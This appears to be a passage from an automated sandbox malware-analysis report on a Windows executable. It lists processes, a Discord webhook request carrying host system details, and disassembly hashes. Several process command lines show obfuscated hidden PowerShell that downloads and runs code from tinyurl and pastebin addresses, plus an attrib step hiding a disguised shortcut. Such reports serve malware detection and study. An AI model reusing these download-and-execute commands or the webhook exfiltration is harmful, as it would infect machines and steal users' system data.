                                            2024-10-15 14:14:56 UTC302OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 65 6e 67 69 6e 65 65 72 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 37 5a 44 36 34 35 58 59 59 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41
                                            Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** 7ZD645XYY\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UA
                                            2024-10-15 14:14:56 UTC1261INHTTP/1.1 404 Not Found
                                            Date: Tue, 15 Oct 2024 14:14:56 GMT
                                            Content-Type: application/json
                                            Content-Length: 45
                                            Connection: close
                                            Cache-Control: public, max-age=3600, s-maxage=3600
                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                            x-ratelimit-limit: 5
                                            x-ratelimit-remaining: 4
                                            x-ratelimit-reset: 1729001697
                                            x-ratelimit-reset-after: 1
                                            via: 1.1 google
                                            alt-svc: h3=":443"; ma=86400
                                            CF-Cache-Status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KiFTFZTyAkPDCd4EbDg1vj%2FtKdvKkf7CV4Qczsqila%2FAUOZxVGV2EQR4AnjqSXvrWE289u%2BkpkDhgkmjjWLnlWD%2FPPU0KXVsc%2BLXFuW%2BiiNbQInPuqEwjtqrOQvR"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            X-Content-Type-Options: nosniff
                                            Set-Cookie: __cfruid=5f98e86f145995a5c309442813900510527bbeff-1729001696; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                            Set-Cookie: _cfuvid=8dhZE4fnVwq1NdwetEp7QCML5rdw_jPPYmBxbRZ2W_Y-1729001696380-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                            Server: cloudflare
                                            CF-RAY: 8d306b19cc97eb37-DFW
                                            2024-10-15 14:14:56 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                            Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:10:13:57
                                            Start date:15/10/2024
                                            Path:C:\Users\user\Desktop\vF20HtY4a4.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Users\user\Desktop\vF20HtY4a4.exe"
                                            Imagebase:0x197c6780000
                                            File size:24'064 bytes
                                            MD5 hash:D17A39CA8331A4CE65261B1B6DC7E6AC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:false

                                            General

                                            Target ID:1
                                            Start time:10:13:57
                                            Start date:15/10/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff66e660000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:false

                                            General

                                            Target ID:3
                                            Start time:10:14:01
                                            Start date:15/10/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing)
                                            Imagebase:0x7ff6e3d50000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:false

                                            General

                                            Target ID:4
                                            Start time:10:14:02
                                            Start date:15/10/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff66e660000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:false

                                            General

                                            Target ID:6
                                            Start time:10:14:29
                                            Start date:15/10/2024
                                            Path:C:\Windows\System32\forfiles.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                            Imagebase:0x7ff715b70000
                                            File size:52'224 bytes
                                            MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            General

                                            Target ID:7
                                            Start time:10:14:30
                                            Start date:15/10/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff66e660000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:8
                                            Start time:10:14:30
                                            Start date:15/10/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                            Imagebase:0x7ff6e3d50000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:10
                                            Start time:10:14:30
                                            Start date:15/10/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                            Imagebase:0x7ff6e3d50000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:11
                                            Start time:10:14:31
                                            Start date:15/10/2024
                                            Path:C:\Windows\System32\attrib.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                            Imagebase:0x7ff6ab100000
                                            File size:23'040 bytes
                                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            General

                                            Target ID:12
                                            Start time:10:14:37
                                            Start date:15/10/2024
                                            Path:C:\Windows\System32\forfiles.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                            Imagebase:0x7ff7934f0000
                                            File size:52'224 bytes
                                            MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            General

                                            Target ID:13
                                            Start time:10:14:37
                                            Start date:15/10/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff66e660000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:14
                                            Start time:10:14:38
                                            Start date:15/10/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                            Imagebase:0x7ff6e3d50000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:15
                                            Start time:10:14:38
                                            Start date:15/10/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                            Imagebase:0x7ff6e3d50000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Disassembly

                                            Reset < >

                                              Executed Functions

                                              Function 00007FFD34650568 Relevance: 3.7, Strings: 2, Instructions: 1212COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4000433809.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd34650000_vF20HtY4a4.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: HAT4$HAT4
                                              • API String ID: 0-3403648473
                                              • Opcode ID: e0bc1955446f6e3df9eb2c97cbc4ce5dbaf60b82fb59897ab035d5b5b997649a
                                              • Instruction ID: 5ddcf188e3076942e80eedd0a261feb2c3b8d5fc7b85fe15ed1b0d262d78981d
                                              • Opcode Fuzzy Hash: e0bc1955446f6e3df9eb2c97cbc4ce5dbaf60b82fb59897ab035d5b5b997649a
                                              • Instruction Fuzzy Hash: 6F61252170EE960FE796AB7C98B12A97BD1EF86224B0940FED08DC72D3CD5D9C468341
                                              Function 00007FFD34650930 Relevance: .0, Instructions: 11COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4000433809.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd34650000_vF20HtY4a4.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f7d6f5281a0bb2a897535002d041cfcfe0e03df9d86daefdeac8b1e5c7d0a821
                                              • Instruction ID: 49a95969a9df76e3f69cd34b473012d846ab0d5842447d0b4696c0cb9374f2f9
                                              • Opcode Fuzzy Hash: f7d6f5281a0bb2a897535002d041cfcfe0e03df9d86daefdeac8b1e5c7d0a821
                                              • Instruction Fuzzy Hash: 52B09262B8A2094AE104A2A8BC910B9F385DBC91FAF898A76E41944149DCBB51824141

                                              Executed Functions

                                              Function 00007FFD3465B976 Relevance: .5, Instructions: 472COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.3023718634.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_7ffd34650000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3782658b628dffbd0692502a0abbf05a48961faeeb9d558c69042755e04ce2c6
                                              • Instruction ID: 323cd4dd50b941a3f6497a6e10a24f574ff9b6eee35c9f80184bb8731eb5dc9d
                                              • Opcode Fuzzy Hash: 3782658b628dffbd0692502a0abbf05a48961faeeb9d558c69042755e04ce2c6
                                              • Instruction Fuzzy Hash: 15F1A630A08A8D8FEBA8DF28C8557E937E1FF55310F04426EE85DC7295DF78A9458B81
                                              Function 00007FFD3465C722 Relevance: .5, Instructions: 458COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.3023718634.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_7ffd34650000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3ee9f12e387217bef786864fca3fe92be2074c0b29604984c7c4476783c81c64
                                              • Instruction ID: 38deffc1f0e9430d6b9947d874883b902c36d818545cfd6d4ab4bb8c5878cd97
                                              • Opcode Fuzzy Hash: 3ee9f12e387217bef786864fca3fe92be2074c0b29604984c7c4476783c81c64
                                              • Instruction Fuzzy Hash: 46E19630A08A4D8FEBA8DF28C8657E97BE1FF55310F14426ED84DC7291DF78A9458781
                                              Function 00007FFD347233D5 Relevance: .4, Instructions: 443COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.3024351278.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_7ffd34720000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cc70da4df36ba5a125af702d6c2a4a06f08e818ebd20cd1da02fa3dcf3b968ab
                                              • Instruction ID: 10bb0940f3c113963fdbe963f784ab2b776678f06c52afa5c7de88d88870d6cd
                                              • Opcode Fuzzy Hash: cc70da4df36ba5a125af702d6c2a4a06f08e818ebd20cd1da02fa3dcf3b968ab
                                              • Instruction Fuzzy Hash: 3DD125B2B0EA8A4FE7A69B7848A55B57BE0EF17350B1801FED14CC7193D91CB805C381
                                              Function 00007FFD347209F2 Relevance: 2.9, Strings: 2, Instructions: 397COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.3024351278.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_7ffd34720000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 1C_L$6Q
                                              • API String ID: 0-727324310
                                              • Opcode ID: 697aa1469199c2b59789fe3b979d657ce82dc60af8f8e1374fb0d606ea3a7a0a
                                              • Instruction ID: 94fbfe62d99b2362b6237ac96e6fb7410053e4e705c9b2cb76a0fa0b0cfd5396
                                              • Opcode Fuzzy Hash: 697aa1469199c2b59789fe3b979d657ce82dc60af8f8e1374fb0d606ea3a7a0a
                                              • Instruction Fuzzy Hash: D0C1496170EBC55FDBAADB2848A99757FE1EF5724070801EFC189CB1A3D919BC06C391
                                              Function 00007FFD3465F16A Relevance: 2.8, Strings: 2, Instructions: 250COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.3023718634.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_7ffd34650000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 87Q$87Q
                                              • API String ID: 0-350966017
                                              • Opcode ID: cba68bb978d45cb7e3dea0372e07dd2cdffa071593f8f0cde6c1c040ed60fd08
                                              • Instruction ID: 693ffa04934f2302b9ffb11ca57ae9175e562242d236a6771e65e798316b0884
                                              • Opcode Fuzzy Hash: cba68bb978d45cb7e3dea0372e07dd2cdffa071593f8f0cde6c1c040ed60fd08
                                              • Instruction Fuzzy Hash: 3871E371B0CA494BEB58EF6898A56F977D1EF99304F0400FDD58DD3693CE68A8028741
                                              Function 00007FFD34720A2B Relevance: 2.7, Strings: 2, Instructions: 243COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.3024351278.00007FFD34720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34720000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_7ffd34720000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 1C_L$6Q
                                              • API String ID: 0-727324310
                                              • Opcode ID: 46cd0a4dc04570153d0b1808e8a7565530a7668e51257129a68e511ab777ce3d
                                              • Instruction ID: 6034a38bc4df14676d9c370b34a3233a2cdcbaa84b43e505f64c8bccf8e3cfef
                                              • Opcode Fuzzy Hash: 46cd0a4dc04570153d0b1808e8a7565530a7668e51257129a68e511ab777ce3d
                                              • Instruction Fuzzy Hash: B3715A70B0EAC55FDBA9DB2888AAD757BE1EF56340B0401BEC14AC71A2D915FC46C7C1
                                              Function 00007FFD3465C336 Relevance: .3, Instructions: 331COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.3023718634.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_7ffd34650000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 716d7160b31c24e10c19652c6fca6178d96e12b665414aaa4be47bfcf7182f51
                                              • Instruction ID: 4fcf0493c338b55d5963ffd3007f5e8cd49811c0eec36d771334731f01cc402c
                                              • Opcode Fuzzy Hash: 716d7160b31c24e10c19652c6fca6178d96e12b665414aaa4be47bfcf7182f51
                                              • Instruction Fuzzy Hash: 14B1933060CB8D4FEB69DF68C8557F93BE1EF55310F04426AE84DC7292DA78A945CB82
                                              Function 00007FFD3465BE34 Relevance: .1, Instructions: 92COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.3023718634.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_7ffd34650000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 133e69dae2d2101dec6d11c418ad2135d48374a6646e19fd5ada6da0585569c1
                                              • Instruction ID: e08ce2a507b42e9e1044ad69807005ffa1b74c474a640e97d894ef2c7deb55a9
                                              • Opcode Fuzzy Hash: 133e69dae2d2101dec6d11c418ad2135d48374a6646e19fd5ada6da0585569c1
                                              • Instruction Fuzzy Hash: 87313A30A1865E8EFBB4AF14CCAABF83294FF42715F40457DD60DCA092CA7C6985DE01
                                              Function 00007FFD3466169D Relevance: .1, Instructions: 59COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.3023718634.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_7ffd34650000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d68ad27fe697ecf63721afe3fbb29d24680cd70ec18913b995a967b3bd44fc8a
                                              • Instruction ID: 26a986c1237b83f4d76c72a73fef617cad7be4780569dc1906cb55211099cdf5
                                              • Opcode Fuzzy Hash: d68ad27fe697ecf63721afe3fbb29d24680cd70ec18913b995a967b3bd44fc8a
                                              • Instruction Fuzzy Hash: F501D299A4E2C56ED7436B3858745F27FE48E8322971D05EBE0D8CA0A3E50C0D5AC397
                                              Function 00007FFD346533B5 Relevance: .0, Instructions: 49COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.3023718634.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_7ffd34650000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                              • Instruction ID: a7b3ec9e85f60c887bf1ab583759d59287a80f7d629e4d15af53f6682909c868
                                              • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                              • Instruction Fuzzy Hash: 3601677121CB0C4FD744EF0CE451AA5B7E0FB95364F10056DE58AC3661DA36E892CB45
                                              Function 00007FFD34664201 Relevance: .0, Instructions: 47COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.3023718634.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_7ffd34650000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 97427c23cb180d63778d0232d6de11dd5b59da3e674c932439439546eb111b2b
                                              • Instruction ID: cd791fc3cfa12e4d7fbc2a62cf9a5402515c60de55b86f2dde56950a914c4750
                                              • Opcode Fuzzy Hash: 97427c23cb180d63778d0232d6de11dd5b59da3e674c932439439546eb111b2b
                                              • Instruction Fuzzy Hash: 81F04601B0EB9A6FE791A76C94256E83BD1EB8A320F0900F6C18CCB1C3DE1D5C068392

                                              Non-executed Functions

                                              Function 00007FFD3465FC15 Relevance: 17.9, Strings: 14, Instructions: 398COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.3023718634.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_7ffd34650000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 8Q$(8Q$08Q$88Q$@8Q$H8Q$P8Q$X8Q$`7Q$h7Q$p7Q$x7Q$7Q$7Q
                                              • API String ID: 0-2818669454
                                              • Opcode ID: 286bb7271e0621f2b0c1a8becc1fb8c8a78ee274ddfa882c82b2bdec72483276
                                              • Instruction ID: 69dd553f7cc41f1cc405ee97564d3139a5e74484e85cb8f98a3c519d3b1cba80
                                              • Opcode Fuzzy Hash: 286bb7271e0621f2b0c1a8becc1fb8c8a78ee274ddfa882c82b2bdec72483276
                                              • Instruction Fuzzy Hash: D3E1B660A1E5C96FC75993F49867EEBFFA0EF06204F280AFAE089AF4D3C9141445C755